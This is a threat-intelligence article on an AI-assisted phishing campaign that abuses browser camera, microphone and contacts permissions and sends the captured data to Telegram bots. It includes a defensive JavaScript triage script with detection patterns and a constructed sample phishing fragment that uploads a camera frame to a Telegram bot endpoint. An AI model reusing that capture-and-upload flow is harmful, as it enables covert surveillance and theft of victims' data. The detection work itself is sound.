Cyble Research & Intelligence Labs has identified a sophisticated AI-powered phishing campaign that marks a significant shift from traditional credential theft tactics to more invasive, technology-driven attacks.
Active since early 2026, the campaign uses a variety of social engineering themes such as “ID scanner,” “Telegram ID freezing,” and “Health Fund AI” to lure victims. These deceptive prompts are designed to trick users into granting access to sensitive device permissions, including cameras and microphones, under the pretense of verification or account recovery.
Once access is granted, malicious scripts begin harvesting extensive data. This includes images, video recordings, microphone audio, device specifications, contact details, and approximate geolocation. The stolen data is quickly transmitted to attacker-controlled systems via Telegram bots, enabling fast and efficient exfiltration. Researchers also observed clear indicators of AI-assisted code development within the campaign. Structured annotations and unusual emoji-based formatting embedded in the scripts suggest that generative AI tools are being used to streamline malware creation and deployment.
The phishing infrastructure relies heavily on the edgeone.app platform, allowing attackers to deploy scalable and cost-effective phishing pages. These pages impersonate well-known platforms such as TikTok, Instagram, Telegram, Google Chrome, and even games like Flappy Bird to build trust and increase user engagement. Unlike conventional phishing attacks that rely on stealing login credentials, this campaign focuses on exploiting browser-level permissions. When a user interacts with a malicious page, embedded JavaScript triggers permission requests. If approved, the script activates the device’s camera and begins capturing live data.
A key technique involves capturing frames from live video streams using HTML5 canvas functions like drawImage() and converting them into image files via toBlob(). These files are then immediately sent to attackers using Telegram Bot APIs. Similar methods are used to capture audio and video recordings. Through these methods, attackers gather detailed insights into the victim’s device, including operating system, browser version, CPU performance, RAM, network type, and battery status. The script also retrieves the victim’s IP address and enriches it with geolocation data such as country, city, latitude, and longitude.
Additionally, the campaign attempts to access user contacts via the browser’s Contacts Picker API. If permission is granted, names, phone numbers, and email addresses are extracted and transmitted to cyberattackers. A notable feature of this operation is its reliance on Telegram for command-and-control (C2) infrastructure. By leveraging Telegram bots and API methods like sendPhoto, sendVideo, and sendAudio, attackers eliminate the need for complex backend systems while gaining instant access to stolen data.
To maintain legitimacy, phishing pages display realistic status messages such as “Capturing photo” and “Sending to server,” mimicking genuine verification processes. After data collection, the script disables the camera and resets the interface, leaving minimal evidence of the attack.
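The capture-then-exfiltrate pattern described above (camera or contacts access combined with direct uploads to a Telegram bot) lends itself to static triage of scripts pulled from suspect pages or proxy captures. The following is an added example, not code from the report or the campaign; the indicator list, the weights, the assumed bot-token shape and both sample fragments are constructed for illustration.

```javascript
// Added example (not from the Cyble report): static triage of a page's JavaScript for the
// indicator combination described above. Indicator names and weights are assumptions.
const INDICATORS = [
  { name: 'camera/mic capture',       re: /mediaDevices\.getUserMedia\s*\(/,  weight: 3 },
  { name: 'canvas frame grab',        re: /\.drawImage\s*\(/,                 weight: 1 },
  { name: 'frame-to-file conversion', re: /\.toBlob\s*\(/,                    weight: 1 },
  { name: 'audio/video recording',    re: /new\s+MediaRecorder\s*\(/,         weight: 2 },
  { name: 'Contacts Picker API',      re: /navigator\.contacts\.select\s*\(/, weight: 3 },
  { name: 'Telegram bot upload',
    re: /api\.telegram\.org\/bot[^\s'"\/]+\/send(Photo|Video|Audio|Document|Message)/, weight: 5 },
];
// Bot token shape (assumed): numeric bot id, colon, opaque secret. Extracted so the
// token can be reported to Telegram or blocked at the proxy, never reused.
const BOT_TOKEN_RE = /api\.telegram\.org\/bot(\d{6,12}:[A-Za-z0-9_-]{30,})/g;

function triageScript(source) {
  const hits = INDICATORS.filter(i => i.re.test(source)).map(i => i.name);
  const score = INDICATORS.filter(i => hits.includes(i.name))
                          .reduce((sum, i) => sum + i.weight, 0);
  const tokens = [...source.matchAll(BOT_TOKEN_RE)].map(m => m[1]);
  // The report's signature is device/contact capture *combined with* a Telegram exfil
  // channel; either half alone is common in benign code (video chat, support widgets).
  const capture = hits.includes('camera/mic capture') || hits.includes('Contacts Picker API');
  const exfil = hits.includes('Telegram bot upload');
  let verdict = 'benign';
  if (capture && exfil) verdict = 'likely permission-abuse phishing';
  else if (capture || exfil) verdict = 'suspicious: review manually';
  return { hits, score, tokens, verdict };
}

// Constructed sample fragments (not real campaign code): the first mirrors the flow
// described in the report, the second is a plausible benign voice-memo widget.
const SAMPLE_PHISH = `
setStatus("Capturing photo...");
const stream = await navigator.mediaDevices.getUserMedia({ video: true, audio: true });
ctx.drawImage(videoEl, 0, 0);
canvas.toBlob(b => fd.append("photo", b, "verify.jpg"));
fetch("https://api.telegram.org/bot123456789:PLACEHOLDER_TOKEN_NOT_A_REAL_SECRET_0000/sendPhoto",
      { method: "POST", body: fd });
`;
const SAMPLE_BENIGN = `
const stream = await navigator.mediaDevices.getUserMedia({ audio: true });
const rec = new MediaRecorder(stream);
rec.ondataavailable = e => fetch("/api/memo", { method: "POST", body: e.data });
`;

console.log(triageScript(SAMPLE_PHISH));   // verdict: likely permission-abuse phishing
console.log(triageScript(SAMPLE_BENIGN));  // verdict: suspicious: review manually
```

The benign fragment still scores as "suspicious" because it captures audio; that is intended, since the decisive signal in this campaign is the pairing with a Telegram bot endpoint, which is also the value worth blocking at the egress proxy.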
The implications of this campaign are severe. By capturing biometric and contextual data, attackers can:
- Conduct identity theft and account takeovers
- Bypass video-based verification and KYC systems
- Launch highly targeted social engineering attacks
- Carry out extortion using recorded media
The use of AI in this campaign highlights a growing trend where threat actors leverage automation to scale operations and increase attack sophistication. Organizations face heightened risks, including reputational damage, regulatory consequences, and financial loss, especially when trusted brands are impersonated. This campaign underscores the urgent need for stronger user awareness, stricter permission controls, and enhanced browser security measures to counter next-generation phishing threats.